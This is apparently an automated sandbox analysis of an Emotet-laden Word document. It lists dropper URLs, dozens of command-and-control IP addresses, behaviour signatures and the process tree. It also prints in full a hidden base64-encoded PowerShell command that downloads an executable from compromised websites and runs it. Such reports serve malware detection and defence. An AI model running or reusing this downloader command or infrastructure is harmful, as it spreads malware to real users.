25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

General
Target

25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

Filesize

N/A

Completed

25-12-2019 01:03

Score
10 /10
SHA256

25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b

Malware Config

Extracted

Language ps1
Source
URLs
exe.dropper

http://diwafashions.com/wp-admin/mqau6/

exe.dropper

http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/

exe.dropper

http://dixartcontractors.com/cgi-bin/nnuv/

exe.dropper

http://diaspotv.info/wordpress/G/

exe.dropper

http://easyvisaoverseas.com/cgi-bin/v/

Extracted

Family emotet
C2

24.181.125.62:80

98.156.206.153:80

173.21.26.90:80

108.61.99.179:8080

165.227.156.155:443

159.69.89.130:8080

167.99.105.223:7080

5.196.74.210:8080

200.7.243.108:443

183.102.238.69:465

64.147.15.138:80

85.152.174.56:80

59.148.227.190:80

62.75.187.192:8080

174.77.190.137:8080

87.106.139.101:8080

173.247.19.238:80

2.38.99.79:80

178.210.51.222:8080

209.141.54.221:8080

91.242.138.5:443

190.147.215.53:22

186.67.208.78:8080

107.170.24.125:8080

81.0.63.86:8080

100.14.117.137:80

190.220.19.82:443

76.164.99.46:80

190.189.224.117:443

110.143.57.109:80

47.156.70.145:80

206.189.112.148:8080

217.160.182.191:8080

47.149.28.234:80

2.237.76.249:80

45.51.40.140:80

128.65.154.183:443

138.59.177.106:443

78.24.219.147:8080

87.230.19.21:8080

200.114.167.85:80

149.202.153.252:8080

82.27.181.93:80

173.91.11.142:80

66.25.34.20:80

190.162.159.212:80

176.106.183.253:8080

139.130.241.252:443

46.105.131.87:80

73.11.153.178:8080

rsa_pubkey.plain
Signatures 13

Filter: none

Discovery
  • Executes dropped EXE
    882.exe882.exe

    Reported IOCs

    pidprocess
    3848882.exe
    4368882.exe
  • Suspicious behavior: EmotetMutantsSpam
    882.exe

    Reported IOCs

    pidprocess
    4368882.exe
  • Checks processor information in registry

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptionioc
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  • Enumerates system info in registry

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptionioc
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\BIOS
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pidprocess
    4968WINWORD.EXE
  • Suspicious use of FindShellTrayWindow
    WINWORD.EXE

    Reported IOCs

    pidprocess
    4968WINWORD.EXE
  • Suspicious use of WriteProcessMemory
    Powershell.exe882.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3344 wrote to memory of 38483344Powershell.exe882.exe
    PID 3848 wrote to memory of 43683848882.exe882.exe
  • Suspicious behavior: EnumeratesProcesses
    Powershell.exe

    Reported IOCs

    pidprocess
    3344Powershell.exe
  • Emotet

    Description

    Emotet is a trojan that is primarily spread through spam emails

  • Drops file in System32 directory
    882.exe

    Reported IOCs

    descriptioniocprocess
    File renamedC:\Users\Admin\882.exe => C:\Windows\SysWOW64\memoraw.exe882.exe
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE882.exe882.exe

    Reported IOCs

    pidprocess
    4968WINWORD.EXE
    3848882.exe
    4368882.exe
  • Process spawned unexpected child process
    Powershell.exe

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process33442088Powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    Powershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege3344Powershell.exe
Processes 4
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b.doc" /o ""
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of FindShellTrayWindow
    Suspicious use of SetWindowsHookEx
    PID:4968
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABWAGgAZAByAGkAZwBwAHQAeQA9ACcARwByAG4AcgBsAHYAagBnAHEAdwBpAGUAbAAnADsAJABRAGgAeQBtAGQAZAB0AHAAdQAgAD0AIAAnADgAOAAyACcAOwAkAFEAeQBmAHIAZgBhAHgAcABzAHAAeQA9ACcAQgBuAGIAbwByAGEAZwB6AGwAcgAnADsAJABLAGEAdABxAGgAcwByAGcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFEAaAB5AG0AZABkAHQAcAB1ACsAJwAuAGUAeABlACcAOwAkAE8AYQBqAG4AZAByAHUAbAByAD0AJwBTAHoAdABnAHUAeAB6AHcAdwBrAHUAbwAnADsAJABGAHUAegBqAGQAcwBnAHYAZQA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAYgBDAGwAaQBFAE4AVAA7ACQAVgB4AHkAegB5AHYAeQBzAGYAbQA9ACcAaAB0AHQAcAA6AC8ALwBkAGkAdwBhAGYAYQBzAGgAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBxAGEAdQA2AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGkAZwBuAGUAcgBzAC4AaABvAHQAYwBvAG0ALQB3AGUAYgAuAGMAbwBtAC8AdQBiAGsAcwBrAHcAMgA5AGMAbABlAGsALwBxAG4AcABtADEAcAAvACoAaAB0AHQAcAA6AC8ALwBkAGkAeABhAHIAdABjAG8AbgB0AHIAYQBjAHQAbwByAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBuAG4AdQB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBhAHMAcABvAHQAdgAuAGkAbgBmAG8ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAEcALwAqAGgAdAB0AHAAOgAvAC8AZQBhAHMAeQB2AGkAcwBhAG8AdgBlAHIAcwBlAGEAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHYALwAnAC4AIgBzAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAUAB1AHcAcQBvAGYAZwBoAGwAPQAnAE4AYgBwAHgAZABuAHUAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAgAGkAbgAgACQAVgB4AHkAegB5AHYAeQBzAGYAbQApAHsAdAByAHkAewAkAEYAdQB6AGoAZABzAGcAdgBlAC4AIgBkAG8AdwBOAEwAbwBhAGQAYABGAGAASQBsAGUAIgAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAsACAAJABLAGEAdABxAGgAcwByAGcAKQA7ACQAUAB5AHUAbQBiAG0AdgBiAHYAdAA9ACcASABuAHgAeQB2AGMAcwBuACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASwBhAHQAcQBoAHMAcgBnACkALgAiAGwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA4ADQAMQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABhAGAAUgBUACIAKAAkAEsAYQB0AHEAaABzAHIAZwApADsAJABHAGcAdwBqAHkAcwB4AHoAPQAnAFgAYQB2AGMAZABtAHMAbABnAHAAeAAnADsAYgByAGUAYQBrADsAJABVAGIAYQBmAHIAcwBrAGYAeQBiAD0AJwBHAGYAYwB4AGkAeQB1AGEAbQBqAG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAGEAYwBlAHgAZQByAHUAYgBpAHgAbgA9ACcAQQBrAHoAeQB5AG8AeABoAHAAJwA=
    Suspicious use of WriteProcessMemory
    Suspicious behavior: EnumeratesProcesses
    Process spawned unexpected child process
    Suspicious use of AdjustPrivilegeToken
    PID:3344
    • C:\Users\Admin\882.exe
      "C:\Users\Admin\882.exe"
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      Suspicious use of SetWindowsHookEx
      PID:3848
      • C:\Users\Admin\882.exe
        --2f98b90
        Executes dropped EXE
        Suspicious behavior: EmotetMutantsSpam
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        PID:4368
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • C:\Users\Admin\882.exe

                        • C:\Users\Admin\882.exe

                        • C:\Users\Admin\882.exe

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

                        • memory/3848-8-0x00000000023C0000-0x00000000023D7000-memory.dmp

                        • memory/4368-11-0x00000000020F0000-0x0000000002107000-memory.dmp

                        • memory/4368-12-0x0000000000400000-0x00000000004AA000-memory.dmp

                        • memory/4968-2-0x00000177E660B000-0x00000177E6614000-memory.dmp